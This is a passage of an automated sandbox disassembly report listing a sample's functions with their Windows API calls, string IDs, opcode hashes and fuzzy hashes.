                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
                                                                                                                                                                        • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                                                                                                                                        • API String ID: 2702461799-3685554107
                                                                                                                                                                        • Opcode ID: 1b93242c84cd324486242e71225b5ffdd83d3cd6d016eccc146effb5f299366a
                                                                                                                                                                        • Instruction ID: a5ce5d3d5f006b7974c4c313ab69db4e7cc006c45c28c95d96c19f58bb4d5bd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b93242c84cd324486242e71225b5ffdd83d3cd6d016eccc146effb5f299366a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1191B231A00609AFDB00DBA8DC45B9EBBF5FF45314F188299E515DB292EB31D904CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE6760 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 00BE685D
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BE6872
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BE687A
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                          • Part of subcall function 00BE84B0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE84FC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$AllocCreateHeapWindow
                                                                                                                                                                        • String ID: SysTabControl32$TabHost
                                                                                                                                                                        • API String ID: 4294867080-2872506973
                                                                                                                                                                        • Opcode ID: 577999934969a01345be247a1de58718d424f834271833d725ee1263739e9484
                                                                                                                                                                        • Instruction ID: fd569aed17f0b5090695fb4c43f429d5b74c9d411c6a45d635e6ac6e7e18c45d
                                                                                                                                                                        • Opcode Fuzzy Hash: 577999934969a01345be247a1de58718d424f834271833d725ee1263739e9484
                                                                                                                                                                        • Instruction Fuzzy Hash: EA51AD71A00605AFDB10DF69C844BAEBBF4FF49710F10429AF815AB390DB74AD04CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCE070 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00CCE1F7
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCE213
                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 00CCE224
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00CCE232
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                        • String ID: open
                                                                                                                                                                        • API String ID: 2321548817-2758837156
                                                                                                                                                                        • Opcode ID: 0bcef71a7455f998b8d3b35603a34bc50069bc50faebca4423a6d24936af871b
                                                                                                                                                                        • Instruction ID: 45ed0f068b82d98783c5b0e9de3f8b9705c2626fe9afb352684470ee3c7c2f6b
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bcef71a7455f998b8d3b35603a34bc50069bc50faebca4423a6d24936af871b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B615A71D006499FDB10CFA9C848BAEBBB4FF4A324F18425DE825AB3D1D7759A44CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC8AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9E7BC,1FC3D414,00000000,00E9E7D8), ref: 00BC8B63
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8BC8
                                                                                                                                                                        • LoadCursorW.USER32(00BB0000,?), ref: 00BC8C24
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8CBB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                                                                        • String ID: ATL:%p
                                                                                                                                                                        • API String ID: 2080323225-4171052921
                                                                                                                                                                        • Opcode ID: 69536be310a4214e088298cc82e0bd7ecea9eb227b49a3fe8de551857e376b49
                                                                                                                                                                        • Instruction ID: 50c8241d4a5a7f21a313bff18af0b08308e5a5f2ee9599077b9fcd9f54d82e2e
                                                                                                                                                                        • Opcode Fuzzy Hash: 69536be310a4214e088298cc82e0bd7ecea9eb227b49a3fe8de551857e376b49
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A51BC71D04B449FDB20CF69C941BAABBF4FF18714F00465EE995A7690EB70B988CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CAB9E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CABEF0: __Init_thread_footer.LIBCMT ref: 00CABF80
                                                                                                                                                                          • Part of subcall function 00CABEF0: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CABFBD
                                                                                                                                                                          • Part of subcall function 00CABEF0: __Init_thread_footer.LIBCMT ref: 00CABFD4
                                                                                                                                                                          • Part of subcall function 00CABEF0: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CABFFF
                                                                                                                                                                        • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CABA32
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00CABA50
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00CABA58
                                                                                                                                                                          • Part of subcall function 00BC72B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BC72E6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
                                                                                                                                                                        • String ID: SysListView32$K
                                                                                                                                                                        • API String ID: 605634508-2788021393
                                                                                                                                                                        • Opcode ID: ffa172ec13a715f8981d79920415de966c33577ac2825247b9674dded2556c35
                                                                                                                                                                        • Instruction ID: 0ce718ea6c544b63b954ff4e055a4467829ba53ace166f00ec3dfc38f021f053
                                                                                                                                                                        • Opcode Fuzzy Hash: ffa172ec13a715f8981d79920415de966c33577ac2825247b9674dded2556c35
                                                                                                                                                                        • Instruction Fuzzy Hash: E8117C31344250BFD6249B16CC05F5BFBAAFFC5750F01461AFA44AB2A1C7B1AD00CAA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D8B5F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1FC3D414,?,?,00000000,00E05D89,000000FF,?,00D8B589,?,?,00D8B55D,?), ref: 00D8B62E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B640
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00E05D89,000000FF,?,00D8B589,?,?,00D8B55D,?), ref: 00D8B662
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        • Opcode ID: bdfe1a4a592f7b4c14e6756c48f5874be3cfad6e13f97c9140aa9402334e1e3e
                                                                                                                                                                        • Instruction ID: aa8541b95dd462f03f988e2e6618b9de563cfeaac97294d0c3e7c789f7cacd65
                                                                                                                                                                        • Opcode Fuzzy Hash: bdfe1a4a592f7b4c14e6756c48f5874be3cfad6e13f97c9140aa9402334e1e3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6301A231940719EFDB019F51DC09FAEBBB8FB04B21F040627E811B22E0DB759844CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD5640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00CD569E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00CD56A5
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD56BC
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                                                                                                                                        • String ID: Dbghelp.dll$SymFromAddr
                                                                                                                                                                        • API String ID: 3268644551-642441706
                                                                                                                                                                        • Opcode ID: 61f0008305822b395c2bf03db5c4d6c1d67de161d2e3102a46827f160caf7a88
                                                                                                                                                                        • Instruction ID: 5a0b4a34404dae8fdbc47ce122f1109d10daa3ecebdf74d22b26a9a0eff072ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 61f0008305822b395c2bf03db5c4d6c1d67de161d2e3102a46827f160caf7a88
                                                                                                                                                                        • Instruction Fuzzy Hash: BA017CB1940744EFC710DF5AED45B14B7A8F708721F20462BFA25B73D0DB75A9088B21
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCB490 Relevance: 7.8, APIs: 5, Instructions: 269COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9946C,1FC3D414,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5), ref: 00BCB4FA
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5), ref: 00BCB57A
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E99488,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5,000000FF), ref: 00BCB733
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E99488,?,?,?,?,?,?,?,?,?,?,00000000,00DAC0C5,000000FF), ref: 00BCB754
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1807155316-0
                                                                                                                                                                        • Opcode ID: fbee9294035965b7d6095f0ea187ec08f21512eae2bad75b446b8b6da059fbf6
                                                                                                                                                                        • Instruction ID: 48d8cf9753cc554de4951f075c73eec178ce52aa60be6d9fd6eb6d401ec15126
                                                                                                                                                                        • Opcode Fuzzy Hash: fbee9294035965b7d6095f0ea187ec08f21512eae2bad75b446b8b6da059fbf6
                                                                                                                                                                        • Instruction Fuzzy Hash: F1B18F71900249DFDB11CFA5D889FAEBBF4EF49314F14809EE844AB291CB75AD48CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC6140 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMessageSendWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 799199299-0
                                                                                                                                                                        • Opcode ID: f98be7ef274b64e5edcf58d9bbf2eabc2b70e8db6f9ddc5956b8289eb377f0b0
                                                                                                                                                                        • Instruction ID: 7eae0175abf51c390b59b1bb01394edb7a1f958148cc33147a277996bc3bb600
                                                                                                                                                                        • Opcode Fuzzy Hash: f98be7ef274b64e5edcf58d9bbf2eabc2b70e8db6f9ddc5956b8289eb377f0b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A41CE323052069FCB148F99D898F66B7E9FF88311F0488BEE596CB161C732E855DB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CC6B50 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00CC6B84
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00CC6BA6
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC6BCE
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00CC6CB7
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC6CE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 459529453-0
                                                                                                                                                                        • Opcode ID: 2b79ea887db46619443ae5d3421d6a0125de25db3955236dd4306d0bfd8ce8a9
                                                                                                                                                                        • Instruction ID: bf213fcd283fa8749f5c839ed8dc88059536fd7c0e24c72ad56366ce7f8f4e0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b79ea887db46619443ae5d3421d6a0125de25db3955236dd4306d0bfd8ce8a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51C4B0900254DFDB21CF58C945BAEBBF4EF00314F24815EE495AB391E775AE49CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC0240 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BC028A
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BC0290
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BC02B3
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9B16,000000FF), ref: 00BC02DB
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9B16,000000FF), ref: 00BC02E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1606019998-0
                                                                                                                                                                        • Opcode ID: 3f5e478730979996e389714dcd0a2f783b816a3327d24488a5b5547f3dfb0dd9
                                                                                                                                                                        • Instruction ID: b4d0e5db828ceae52968f8f3f0fd1c9c5689b5217cf3988c61ab2cdf4f6662e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f5e478730979996e389714dcd0a2f783b816a3327d24488a5b5547f3dfb0dd9
                                                                                                                                                                        • Instruction Fuzzy Hash: F91163B0A54219AFEB10DF94DC06FAFB7B8EB04704F104519F614AB2C1D7B5A6048BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD79F0 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BD79FB
                                                                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 00BD7A58
                                                                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 00BD7AA7
                                                                                                                                                                        • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00BD7AB8
                                                                                                                                                                        • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00BD7AC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
